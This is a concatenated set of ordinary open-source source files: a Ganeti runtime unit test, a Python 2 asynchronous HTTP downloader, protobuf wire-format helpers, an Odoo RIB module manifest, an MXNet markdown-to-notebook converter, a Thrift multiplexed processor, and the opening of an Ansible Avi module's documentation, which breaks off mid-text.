# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script for testing ganeti.runtime"""
from ganeti import constants
from ganeti import errors
from ganeti import runtime
from ganeti import ht
import testutils
import unittest
class _EntStub:
def __init__(self, uid=None, gid=None):
self.pw_uid = uid
self.gr_gid = gid
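# Stubs mimicking pwd.getpwnam/grp.getgrnam so GetentResolver can be exercised
# without depending on the users and groups present on the build host.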
def _StubGetpwnam(user):
users = {
constants.MASTERD_USER: _EntStub(uid=0),
constants.CONFD_USER: _EntStub(uid=1),
constants.RAPI_USER: _EntStub(uid=2),
constants.NODED_USER: _EntStub(uid=3),
constants.LUXID_USER: _EntStub(uid=4),
constants.WCONFD_USER: _EntStub(uid=5),
}
return users[user]
def _StubGetgrnam(group):
groups = {
constants.MASTERD_GROUP: _EntStub(gid=0),
constants.CONFD_GROUP: _EntStub(gid=1),
constants.RAPI_GROUP: _EntStub(gid=2),
constants.DAEMONS_GROUP: _EntStub(gid=3),
constants.ADMIN_GROUP: _EntStub(gid=4),
constants.NODED_GROUP: _EntStub(gid=5),
constants.LUXID_GROUP: _EntStub(gid=6),
constants.WCONFD_GROUP: _EntStub(gid=7),
}
return groups[group]
def _RaisingStubGetpwnam(user):
raise KeyError("user not found")
def _RaisingStubGetgrnam(group):
raise KeyError("group not found")
class ResolverStubRaising(object):
def __init__(self):
raise errors.ConfigurationError("No entries")
class TestErrors(unittest.TestCase):
def setUp(self):
self.resolver = runtime.GetentResolver(_getpwnam=_StubGetpwnam,
_getgrnam=_StubGetgrnam)
def testEverythingSuccessful(self):
self.assertEqual(self.resolver.masterd_uid,
_StubGetpwnam(constants.MASTERD_USER).pw_uid)
self.assertEqual(self.resolver.masterd_gid,
_StubGetgrnam(constants.MASTERD_GROUP).gr_gid)
self.assertEqual(self.resolver.confd_uid,
_StubGetpwnam(constants.CONFD_USER).pw_uid)
self.assertEqual(self.resolver.confd_gid,
_StubGetgrnam(constants.CONFD_GROUP).gr_gid)
self.assertEqual(self.resolver.wconfd_uid,
_StubGetpwnam(constants.WCONFD_USER).pw_uid)
self.assertEqual(self.resolver.wconfd_gid,
_StubGetgrnam(constants.WCONFD_GROUP).gr_gid)
self.assertEqual(self.resolver.rapi_uid,
_StubGetpwnam(constants.RAPI_USER).pw_uid)
self.assertEqual(self.resolver.rapi_gid,
_StubGetgrnam(constants.RAPI_GROUP).gr_gid)
self.assertEqual(self.resolver.noded_uid,
_StubGetpwnam(constants.NODED_USER).pw_uid)
self.assertEqual(self.resolver.daemons_gid,
_StubGetgrnam(constants.DAEMONS_GROUP).gr_gid)
self.assertEqual(self.resolver.admin_gid,
_StubGetgrnam(constants.ADMIN_GROUP).gr_gid)
def testUserNotFound(self):
self.assertRaises(errors.ConfigurationError, runtime.GetentResolver,
_getpwnam=_RaisingStubGetpwnam, _getgrnam=_StubGetgrnam)
def testGroupNotFound(self):
self.assertRaises(errors.ConfigurationError, runtime.GetentResolver,
_getpwnam=_StubGetpwnam, _getgrnam=_RaisingStubGetgrnam)
def testUserNotFoundGetEnts(self):
self.assertRaises(errors.ConfigurationError, runtime.GetEnts,
resolver=ResolverStubRaising)
def testLookupForUser(self):
master_stub = _StubGetpwnam(constants.MASTERD_USER)
rapi_stub = _StubGetpwnam(constants.RAPI_USER)
self.assertEqual(self.resolver.LookupUid(master_stub.pw_uid),
constants.MASTERD_USER)
self.assertEqual(self.resolver.LookupUid(rapi_stub.pw_uid),
constants.RAPI_USER)
self.assertEqual(self.resolver.LookupUser(constants.MASTERD_USER),
master_stub.pw_uid)
self.assertEqual(self.resolver.LookupUser(constants.RAPI_USER),
rapi_stub.pw_uid)
def testLookupForGroup(self):
master_stub = _StubGetgrnam(constants.MASTERD_GROUP)
rapi_stub = _StubGetgrnam(constants.RAPI_GROUP)
self.assertEqual(self.resolver.LookupGid(master_stub.gr_gid),
constants.MASTERD_GROUP)
self.assertEqual(self.resolver.LookupGid(rapi_stub.gr_gid),
constants.RAPI_GROUP)
def testLookupForUserNotFound(self):
self.assertRaises(errors.ConfigurationError, self.resolver.LookupUid, 9999)
self.assertRaises(errors.ConfigurationError,
self.resolver.LookupUser, "does-not-exist-foo")
def testLookupForGroupNotFound(self):
self.assertRaises(errors.ConfigurationError, self.resolver.LookupGid, 9999)
self.assertRaises(errors.ConfigurationError,
self.resolver.LookupGroup, "does-not-exist-foo")
class TestArchInfo(unittest.TestCase):
EXP_TYPES = \
ht.TAnd(ht.TIsLength(2),
ht.TItems([
ht.TNonEmptyString,
ht.TNonEmptyString,
]))
def setUp(self):
self.assertTrue(runtime._arch is None)
def tearDown(self):
runtime._arch = None
def testNotInitialized(self):
self.assertRaises(errors.ProgrammerError, runtime.GetArchInfo)
def testInitializeMultiple(self):
runtime.InitArchInfo()
self.assertRaises(errors.ProgrammerError, runtime.InitArchInfo)
def testNormal(self):
runtime.InitArchInfo()
info = runtime.GetArchInfo()
self.assertTrue(self.EXP_TYPES(info),
msg=("Doesn't match expected type description: %s" %
self.EXP_TYPES))
if __name__ == "__main__":
testutils.GanetiTestProgram()
|
myself659/xunlei-lixian
|
refs/heads/master
|
lixian_download_asyn.py
|
14
|
import asyncore
import asynchat
import socket
import re
#from cStringIO import StringIO
from time import time, sleep
import sys
import os
#asynchat.async_chat.ac_out_buffer_size = 1024*1024
class http_client(asynchat.async_chat):
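	# Asynchronous HTTP GET client built on asynchat: reads the status line and
	# headers up to the blank line, then streams the body through handle_data().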
def __init__(self, url, headers=None, start_from=0):
asynchat.async_chat.__init__(self)
self.args = {'headers': headers, 'start_from': start_from}
m = re.match(r'http://([^/:]+)(?::(\d+))?(/.*)?$', url)
assert m, 'Invalid url: %s' % url
host, port, path = m.groups()
port = int(port or 80)
path = path or '/'
def resolve_host(host):
try:
return socket.gethostbyname(host)
except:
pass
host_ip = resolve_host(host)
if not host_ip:
self.log_error("host can't be resolved: " + host)
self.size = None
return
if host_ip == '180.168.41.175':
# fuck shanghai dian DNS
self.log_error('gethostbyname failed')
self.size = None
return
request_headers = {'host': host, 'connection': 'close'}
if start_from:
request_headers['RANGE'] = 'bytes=%d-' % start_from
if headers:
request_headers.update(headers)
headers = request_headers
self.request = 'GET %s HTTP/1.1\r\n%s\r\n\r\n' % (path, '\r\n'.join('%s: %s' % (k, headers[k]) for k in headers))
self.op = 'GET'
self.headers = {} # for response headers
#self.buffer = StringIO()
self.buffer = []
self.buffer_size = 0
self.cache_size = 1024*1024
self.size = None
self.completed = 0
self.set_terminator("\r\n\r\n")
self.reading_headers = True
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.connect((host, port))
except:
self.close()
self.log_error('connect_failed')
def handle_connect(self):
self.start_time = time()
self.push(self.request)
def handle_close(self):
asynchat.async_chat.handle_close(self)
self.flush_data()
if self.reading_headers:
self.log_error('incomplete http response')
return
self.handle_status_update(self.size, self.completed, force_update=True)
self.handle_speed_update(self.completed, self.start_time, force_update=True)
if self.size is not None and self.completed < self.size:
self.log_error('incomplete download')
def handle_connection_error(self):
self.handle_error()
def handle_error(self):
self.close()
self.flush_data()
error_message = sys.exc_info()[1]
self.log_error('there is some error: %s' % error_message)
#raise
def collect_incoming_data(self, data):
if self.reading_headers:
#self.buffer.write(data)
self.buffer.append(data)
self.buffer_size += len(data)
return
elif self.cache_size:
#self.buffer.write(data)
self.buffer.append(data)
self.buffer_size += len(data)
#if self.buffer.tell() > self.cache_size:
if self.buffer_size > self.cache_size:
#self.handle_data(self.buffer.getvalue())
self.handle_data(''.join(self.buffer))
#self.buffer.truncate(0)
#self.buffer.clear()
del self.buffer[:]
self.buffer_size = 0
else:
self.handle_data(data)
self.completed += len(data)
self.handle_status_update(self.size, self.completed)
self.handle_speed_update(self.completed, self.start_time)
if self.size == self.completed:
self.close()
self.flush_data()
self.handle_status_update(self.size, self.completed, force_update=True)
self.handle_speed_update(self.completed, self.start_time, force_update=True)
def handle_data(self, data):
print len(data)
pass
def flush_data(self):
#if self.buffer.tell():
if self.buffer_size:
#self.handle_data(self.buffer.getvalue())
self.handle_data(''.join(self.buffer))
#self.buffer.truncate(0)
del self.buffer[:]
self.buffer_size = 0
def parse_headers(self, header):
lines = header.split('\r\n')
status_line = lines.pop(0)
#print status_line
		protocol, status_code, status_text = re.match(r'^HTTP/([\d.]+) (\d+) (.+)$', status_line).groups()
status_code = int(status_code)
self.status_code = status_code
self.status_text = status_text
#headers = dict(h.split(': ', 1) for h in lines)
for k, v in (h.split(': ', 1) for h in lines):
self.headers[k.lower()] = v
if status_code in (200, 206):
pass
elif status_code == 302:
return self.handle_http_relocate(self.headers['location'])
else:
return self.handle_http_status_error()
self.size = self.headers.get('content-length', None)
if self.size is not None:
self.size = int(self.size)
self.handle_http_headers()
def found_terminator(self):
if self.reading_headers:
self.reading_headers = False
#self.parse_headers("".join(self.buffer.getvalue()))
self.parse_headers("".join(self.buffer))
#self.buffer.truncate(0)
del self.buffer[:]
self.buffer_size = 0
self.set_terminator(None)
else:
raise NotImplementedError()
def handle_http_headers(self):
pass
def handle_http_status_error(self):
self.close()
def handle_http_relocate(self, location):
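		# On redirect, close this connection and create a fresh client for the
		# new location; download() follows the chain through self.next_client.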
self.close()
relocate_times = getattr(self, 'relocate_times', 0)
max_relocate_times = getattr(self, 'max_relocate_times', 2)
if relocate_times >= max_relocate_times:
raise Exception('too many relocate times')
new_client = self.__class__(location, **self.args)
new_client.relocate_times = relocate_times + 1
new_client.max_relocate_times = max_relocate_times
self.next_client = new_client
def handle_status_update(self, total, completed, force_update=False):
pass
def handle_speed_update(self, completed, start_time, force_update=False):
pass
def log_error(self, message):
print 'log_error', message
self.error_message = message
class ProgressBar:
def __init__(self, total=0):
self.total = total
self.completed = 0
self.start = time()
self.speed = 0
self.bar_width = 0
self.displayed = False
def update(self):
self.displayed = True
bar_size = 40
if self.total:
percent = self.completed * 100.0 / self.total
if percent > 100:
percent = 100.0
dots = int(bar_size * percent / 100)
plus = percent / 100 * bar_size - dots
if plus > 0.8:
plus = '='
elif plus > 0.4:
plus = '-'
else:
plus = ''
bar = '=' * dots + plus
percent = int(percent)
else:
percent = 0
bar = '-'
speed = self.speed
if speed < 1000:
speed = '%sB/s' % int(speed)
elif speed < 1000*10:
speed = '%.1fK/s' % (speed/1000.0)
elif speed < 1000*1000:
speed = '%dK/s' % int(speed/1000)
elif speed < 1000*1000*100:
speed = '%.1fM/s' % (speed/1000.0/1000.0)
else:
speed = '%dM/s' % int(speed/1000/1000)
seconds = time() - self.start
if seconds < 10:
seconds = '%.1fs' % seconds
elif seconds < 60:
seconds = '%ds' % int(seconds)
elif seconds < 60*60:
seconds = '%dm%ds' % (int(seconds/60), int(seconds)%60)
elif seconds < 60*60*24:
seconds = '%dh%dm%ds' % (int(seconds)/60/60, (int(seconds)/60)%60, int(seconds)%60)
else:
seconds = int(seconds)
days = seconds/60/60/24
seconds -= days*60*60*24
hours = seconds/60/60
seconds -= hours*60*60
minutes = seconds/60
seconds -= minutes*60
seconds = '%dd%dh%dm%ds' % (days, hours, minutes, seconds)
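		# Insert thousands separators into the byte count (1234567 -> 1,234,567).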
completed = ','.join((x[::-1] for x in reversed(re.findall('..?.?', str(self.completed)[::-1]))))
bar = '{0:>3}%[{1:<40}] {2:<12} {3:>4} in {4:>6s}'.format(percent, bar, completed, speed, seconds)
new_bar_width = len(bar)
bar = bar.ljust(self.bar_width)
self.bar_width = new_bar_width
sys.stdout.write('\r'+bar)
sys.stdout.flush()
def update_status(self, total, completed):
self.total = total
self.completed = completed
self.update()
def update_speed(self, start, speed):
self.start = start
self.speed = speed
self.update()
def done(self):
if self.displayed:
print
self.displayed = False
def download(url, path, headers=None, resuming=False):
class download_client(http_client):
def __init__(self, url, headers=headers, start_from=0):
self.output = None
self.bar = ProgressBar()
http_client.__init__(self, url, headers=headers, start_from=start_from)
self.start_from = start_from
self.last_status_time = time()
self.last_speed_time = time()
self.last_size = 0
self.path = path
def handle_close(self):
http_client.handle_close(self)
if self.output:
self.output.close()
self.output = None
def handle_http_status_error(self):
http_client.handle_http_status_error(self)
self.log_error('http status error: %s, %s' % (self.status_code, self.status_text))
def handle_data(self, data):
if not self.output:
if self.start_from:
self.output = open(path, 'ab')
else:
self.output = open(path, 'wb')
self.output.write(data)
def handle_status_update(self, total, completed, force_update=False):
if total is None:
return
if time() - self.last_status_time > 1 or force_update:
#print '%.02f' % (completed*100.0/total)
self.bar.update_status(total+start_from, completed+start_from)
self.last_status_time = time()
def handle_speed_update(self, completed, start_time, force_update=False):
now = time()
period = now - self.last_speed_time
if period > 1 or force_update:
#print '%.02f, %.02f' % ((completed-self.last_size)/period, completed/(now-start_time))
self.bar.update_speed(start_time, (completed-self.last_size)/period)
self.last_speed_time = time()
self.last_size = completed
def log_error(self, message):
self.bar.done()
http_client.log_error(self, message)
def __del__(self): # XXX: sometimes handle_close() is not called, don't know why...
#http_client.__del__(self)
if self.output:
self.output.close()
self.output = None
max_retry_times = 25
retry_times = 0
start_from = 0
if resuming and os.path.exists(path):
start_from = os.path.getsize(path)
# TODO: fix status bar for resuming
while True:
client = download_client(url, start_from=start_from)
asyncore.loop()
while hasattr(client, 'next_client'):
client = client.next_client
client.bar.done()
if getattr(client, 'error_message', None):
retry_times += 1
if retry_times >= max_retry_times:
raise Exception(client.error_message)
if client.size and client.completed:
start_from = os.path.getsize(path)
print 'retry', retry_times
sleep(retry_times)
else:
break
def main():
url, path = sys.argv[1:]
download(url, path)
if __name__ == '__main__':
main()
|
toomoresuch/pysonengine
|
refs/heads/master
|
parts/google_appengine/google/net/proto2/python/internal/wire_format.py
|
3
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Constants and static functions to support protocol buffer wire format."""
import struct
from google.net.proto2.python.public import descriptor
from google.net.proto2.python.public import message
TAG_TYPE_BITS = 3
TAG_TYPE_MASK = (1 << TAG_TYPE_BITS) - 1
WIRETYPE_VARINT = 0
WIRETYPE_FIXED64 = 1
WIRETYPE_LENGTH_DELIMITED = 2
WIRETYPE_START_GROUP = 3
WIRETYPE_END_GROUP = 4
WIRETYPE_FIXED32 = 5
_WIRETYPE_MAX = 5
INT32_MAX = int((1 << 31) - 1)
INT32_MIN = int(-(1 << 31))
UINT32_MAX = (1 << 32) - 1
INT64_MAX = (1 << 63) - 1
INT64_MIN = -(1 << 63)
UINT64_MAX = (1 << 64) - 1
FORMAT_UINT32_LITTLE_ENDIAN = '<I'
FORMAT_UINT64_LITTLE_ENDIAN = '<Q'
FORMAT_FLOAT_LITTLE_ENDIAN = '<f'
FORMAT_DOUBLE_LITTLE_ENDIAN = '<d'
if struct.calcsize(FORMAT_UINT32_LITTLE_ENDIAN) != 4:
raise AssertionError('Format "I" is not a 32-bit number.')
if struct.calcsize(FORMAT_UINT64_LITTLE_ENDIAN) != 8:
raise AssertionError('Format "Q" is not a 64-bit number.')
def PackTag(field_number, wire_type):
"""Returns an unsigned 32-bit integer that encodes the field number and
wire type information in standard protocol message wire format.
Args:
field_number: Expected to be an integer in the range [1, 1 << 29)
wire_type: One of the WIRETYPE_* constants.
"""
if not 0 <= wire_type <= _WIRETYPE_MAX:
raise message.EncodeError('Unknown wire type: %d' % wire_type)
return (field_number << TAG_TYPE_BITS) | wire_type
def UnpackTag(tag):
"""The inverse of PackTag(). Given an unsigned 32-bit number,
returns a (field_number, wire_type) tuple.
"""
return (tag >> TAG_TYPE_BITS), (tag & TAG_TYPE_MASK)
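# Example (illustrative): PackTag(field_number=1, wire_type=WIRETYPE_VARINT)
# yields (1 << TAG_TYPE_BITS) | 0 == 8, and UnpackTag(8) returns (1, 0) again.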
def ZigZagEncode(value):
"""ZigZag Transform: Encodes signed integers so that they can be
effectively used with varint encoding. See wire_format.h for
more details.
"""
if value >= 0:
return value << 1
return (value << 1) ^ (~0)
def ZigZagDecode(value):
"""Inverse of ZigZagEncode()."""
if not value & 0x1:
return value >> 1
return (value >> 1) ^ (~0)
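# Worked examples (illustrative): ZigZagEncode maps 0 -> 0, -1 -> 1, 1 -> 2,
# -2 -> 3, 2 -> 4, so values of small magnitude encode to small varints
# regardless of sign; ZigZagDecode inverts each of these mappings.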
def Int32ByteSize(field_number, int32):
return Int64ByteSize(field_number, int32)
def Int32ByteSizeNoTag(int32):
return _VarUInt64ByteSizeNoTag(0xffffffffffffffff & int32)
def Int64ByteSize(field_number, int64):
return UInt64ByteSize(field_number, 0xffffffffffffffff & int64)
def UInt32ByteSize(field_number, uint32):
return UInt64ByteSize(field_number, uint32)
def UInt64ByteSize(field_number, uint64):
return TagByteSize(field_number) + _VarUInt64ByteSizeNoTag(uint64)
def SInt32ByteSize(field_number, int32):
return UInt32ByteSize(field_number, ZigZagEncode(int32))
def SInt64ByteSize(field_number, int64):
return UInt64ByteSize(field_number, ZigZagEncode(int64))
def Fixed32ByteSize(field_number, fixed32):
return TagByteSize(field_number) + 4
def Fixed64ByteSize(field_number, fixed64):
return TagByteSize(field_number) + 8
def SFixed32ByteSize(field_number, sfixed32):
return TagByteSize(field_number) + 4
def SFixed64ByteSize(field_number, sfixed64):
return TagByteSize(field_number) + 8
def FloatByteSize(field_number, flt):
return TagByteSize(field_number) + 4
def DoubleByteSize(field_number, double):
return TagByteSize(field_number) + 8
def BoolByteSize(field_number, b):
return TagByteSize(field_number) + 1
def EnumByteSize(field_number, enum):
return UInt32ByteSize(field_number, enum)
def StringByteSize(field_number, string):
return BytesByteSize(field_number, string.encode('utf-8'))
def BytesByteSize(field_number, b):
return (TagByteSize(field_number)
+ _VarUInt64ByteSizeNoTag(len(b))
+ len(b))
def GroupByteSize(field_number, message):
return (2 * TagByteSize(field_number)
+ message.ByteSize())
def MessageByteSize(field_number, message):
return (TagByteSize(field_number)
+ _VarUInt64ByteSizeNoTag(message.ByteSize())
+ message.ByteSize())
def MessageSetItemByteSize(field_number, msg):
total_size = (2 * TagByteSize(1) + TagByteSize(2) + TagByteSize(3))
total_size += _VarUInt64ByteSizeNoTag(field_number)
message_size = msg.ByteSize()
total_size += _VarUInt64ByteSizeNoTag(message_size)
total_size += message_size
return total_size
def TagByteSize(field_number):
"""Returns the bytes required to serialize a tag with this field number."""
return _VarUInt64ByteSizeNoTag(PackTag(field_number, 0))
def _VarUInt64ByteSizeNoTag(uint64):
"""Returns the number of bytes required to serialize a single varint
using boundary value comparisons. (unrolled loop optimization -WPierce)
uint64 must be unsigned.
"""
if uint64 <= 0x7f: return 1
if uint64 <= 0x3fff: return 2
if uint64 <= 0x1fffff: return 3
if uint64 <= 0xfffffff: return 4
if uint64 <= 0x7ffffffff: return 5
if uint64 <= 0x3ffffffffff: return 6
if uint64 <= 0x1ffffffffffff: return 7
if uint64 <= 0xffffffffffffff: return 8
if uint64 <= 0x7fffffffffffffff: return 9
if uint64 > UINT64_MAX:
raise message.EncodeError('Value out of range: %d' % uint64)
return 10
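# Examples (illustrative): _VarUInt64ByteSizeNoTag(1) == 1, (128) == 2,
# (16384) == 3; TagByteSize(16) == 2 because PackTag(16, 0) == 128, which
# needs a two-byte varint.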
NON_PACKABLE_TYPES = (
descriptor.FieldDescriptor.TYPE_STRING,
descriptor.FieldDescriptor.TYPE_GROUP,
descriptor.FieldDescriptor.TYPE_MESSAGE,
descriptor.FieldDescriptor.TYPE_BYTES
)
def IsTypePackable(field_type):
"""Return true iff packable = true is valid for fields of this type.
Args:
field_type: a FieldDescriptor::Type value.
Returns:
True iff fields of this type are packable.
"""
return field_type not in NON_PACKABLE_TYPES
|
papouso/odoo
|
refs/heads/8.0
|
addons/l10n_fr_rib/__openerp__.py
|
425
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 Numérigraphe SARL.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'French RIB Bank Details',
'version': '1.0',
'category': 'Hidden/Dependency',
'description': """
This module lets users enter the banking details of Partners in the RIB format (French standard for bank accounts details).
===========================================================================================================================
RIB Bank Accounts can be entered in the "Accounting" tab of the Partner form by specifying the account type "RIB".
The four standard RIB fields will then become mandatory:
--------------------------------------------------------
- Bank Code
- Office Code
- Account number
- RIB key
As a safety measure, OpenERP will check the RIB key whenever a RIB is saved, and
will refuse to record the data if the key is incorrect. Please bear in mind that
this can only happen when the user presses the 'save' button, for example on the
Partner Form. Since each bank account may relate to a Bank, users may enter the
RIB Bank Code in the Bank form - it will then pre-fill the Bank Code on the RIB
when they select the Bank. To make this easier, this module will also let users
find Banks using their RIB code.
The module base_iban can be a useful addition to this module, because French banks
are now progressively adopting the international IBAN format instead of the RIB format.
The RIB and IBAN codes for a single account can be entered by recording two Bank
Accounts in OpenERP: the first with the type 'RIB', the second with the type 'IBAN'.
""",
'author' : u'Numérigraphe SARL',
'depends': ['account', 'base_iban'],
'data': ['bank_data.xml', 'bank_view.xml'],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
DickJC123/mxnet
|
refs/heads/master
|
docs/python_docs/python/scripts/md2ipynb.py
|
7
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sys
import os
import time
import notedown
import nbformat
def md2ipynb():
assert len(sys.argv) == 3, 'usage: input.md output.ipynb'
(src_fn, input_fn, output_fn) = sys.argv
# timeout for each notebook, in sec
timeout = 20 * 60
# whether to enable evaluation
do_eval = int(os.environ.get('EVAL', True))
reader = notedown.MarkdownReader(match='strict')
with open(input_fn, 'r', encoding="utf8") as f:
notebook = reader.read(f)
if do_eval:
tic = time.time()
notedown.run(notebook, timeout)
print('%s: Evaluated %s in %f sec'%(src_fn, input_fn, time.time()-tic))
# need to add language info for syntax highlighting
notebook['metadata'].update({'language_info':{'name':'python'}})
with open(output_fn, 'w', encoding='utf-8') as f:
f.write(nbformat.writes(notebook))
print('%s: Write results into %s'%(src_fn, output_fn))
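# Example invocation (hypothetical file names):
#   python md2ipynb.py tutorial.md tutorial.ipynb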
if __name__ == '__main__':
md2ipynb()
|
petteyg/intellij-community
|
refs/heads/master
|
python/helpers/profiler/thrift/TMultiplexedProcessor.py
|
146
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from thrift.Thrift import TProcessor, TMessageType, TException
from thrift.protocol import TProtocolDecorator, TMultiplexedProtocol
class TMultiplexedProcessor(TProcessor):
def __init__(self):
self.services = {}
def registerProcessor(self, serviceName, processor):
self.services[serviceName] = processor
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if type != TMessageType.CALL and type != TMessageType.ONEWAY:
raise TException("TMultiplex protocol only supports CALL & ONEWAY")
index = name.find(TMultiplexedProtocol.SEPARATOR)
if index < 0:
raise TException("Service name not found in message name: " + name + ". Did you forget to use TMultiplexProtocol in your client?")
serviceName = name[0:index]
call = name[index+len(TMultiplexedProtocol.SEPARATOR):]
if not serviceName in self.services:
raise TException("Service name not found: " + serviceName + ". Did you forget to call registerProcessor()?")
standardMessage = (
call,
type,
seqid
)
return self.services[serviceName].process(StoredMessageProtocol(iprot, standardMessage), oprot)
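# Example (illustrative): with TMultiplexedProtocol.SEPARATOR == ':', a message
# named 'Calculator:add' is routed to the processor registered under
# 'Calculator', which then sees readMessageBegin() replayed as ('add', type, seqid).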
class StoredMessageProtocol(TProtocolDecorator.TProtocolDecorator):
def __init__(self, protocol, messageBegin):
TProtocolDecorator.TProtocolDecorator.__init__(self, protocol)
self.messageBegin = messageBegin
def readMessageBegin(self):
return self.messageBegin
|
richardcs/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/avi/avi_virtualservice.py
|
29
|
#!/usr/bin/python
#
# @author: Gaurav Rastogi ([email protected])
# Eric Anderson ([email protected])
# module_check: supported
# Avi Version: 17.1.1
#
# Copyright: (c) 2017 Gaurav Rastogi, <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_virtualservice
author: Gaurav Rastogi (@grastogi23) <[email protected]>
short_description: Module for setup of VirtualService Avi RESTful Object
description:
- This module is used to configure VirtualService object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.3"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent", "present"]
avi_api_update_method:
description:
- Default method for object update is HTTP PUT.
- Setting to patch will override that behavior to use HTTP PATCH.
version_added: "2.5"
default: put
choices: ["put", "patch"]
avi_api_patch_op:
description:
- Patch operation to use when using avi_api_update_method as patch.
version_added: "2.5"
choices: ["add", "replace", "delete"]
active_standby_se_tag:
description:
- This configuration only applies if the virtualservice is in legacy active standby ha mode and load distribution among active standby is enabled.
- This field is used to tag the virtualservice so that virtualservices with the same tag will share the same active serviceengine.
- Virtualservices with different tags will have different active serviceengines.
- If one of the serviceengines in the serviceenginegroup fails, all virtualservices will end up using the same active serviceengine.
- Redistribution of the virtualservices can be either manual or automated when the failed serviceengine recovers.
- Redistribution is based on the auto redistribute property of the serviceenginegroup.
- Enum options - ACTIVE_STANDBY_SE_1, ACTIVE_STANDBY_SE_2.
- Default value when not specified in API or module is interpreted by Avi Controller as ACTIVE_STANDBY_SE_1.
analytics_policy:
description:
- Determines analytics settings for the application.
analytics_profile_ref:
description:
- Specifies settings related to analytics.
- It is a reference to an object of type analyticsprofile.
application_profile_ref:
description:
- Enable application layer specific features for the virtual service.
- It is a reference to an object of type applicationprofile.
auto_allocate_floating_ip:
description:
- Auto-allocate floating/elastic ip from the cloud infrastructure.
- Field deprecated in 17.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
auto_allocate_ip:
description:
- Auto-allocate vip from the provided subnet.
- Field deprecated in 17.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
availability_zone:
description:
- Availability-zone to place the virtual service.
- Field deprecated in 17.1.1.
avi_allocated_fip:
description:
- (internal-use) fip allocated by avi in the cloud infrastructure.
- Field deprecated in 17.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
avi_allocated_vip:
description:
- (internal-use) vip allocated by avi in the cloud infrastructure.
- Field deprecated in 17.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
bulk_sync_kvcache:
description:
- (this is a beta feature).
- Sync key-value cache to the new ses when vs is scaled out.
- For ex ssl sessions are stored using vs's key-value cache.
- When the vs is scaled out, the ssl session information is synced to the new se, allowing existing ssl sessions to be reused on the new se.
- Field introduced in 17.2.7, 18.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
version_added: "2.6"
type: bool
client_auth:
description:
- Http authentication configuration for protected resources.
close_client_conn_on_config_update:
description:
- Close client connection on vs config update.
- Field introduced in 17.2.4.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
version_added: "2.5"
type: bool
cloud_config_cksum:
description:
- Checksum of cloud configuration for vs.
- Internally set by cloud connector.
cloud_ref:
description:
- It is a reference to an object of type cloud.
cloud_type:
description:
- Enum options - cloud_none, cloud_vcenter, cloud_openstack, cloud_aws, cloud_vca, cloud_apic, cloud_mesos, cloud_linuxserver, cloud_docker_ucp,
- cloud_rancher, cloud_oshift_k8s, cloud_azure.
- Default value when not specified in API or module is interpreted by Avi Controller as CLOUD_NONE.
connections_rate_limit:
description:
- Rate limit the incoming connections to this virtual service.
content_rewrite:
description:
- Profile used to match and rewrite strings in request and/or response body.
created_by:
description:
- Creator name.
delay_fairness:
description:
- Select the algorithm for qos fairness.
- This determines how multiple virtual services sharing the same service engines will prioritize traffic over a congested network.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
description:
description:
- User defined description for the object.
discovered_network_ref:
description:
- (internal-use) discovered networks providing reachability for client facing virtual service ip.
- This field is deprecated.
- It is a reference to an object of type network.
- Field deprecated in 17.1.1.
discovered_networks:
description:
- (internal-use) discovered networks providing reachability for client facing virtual service ip.
- This field is used internally by avi, not editable by the user.
- Field deprecated in 17.1.1.
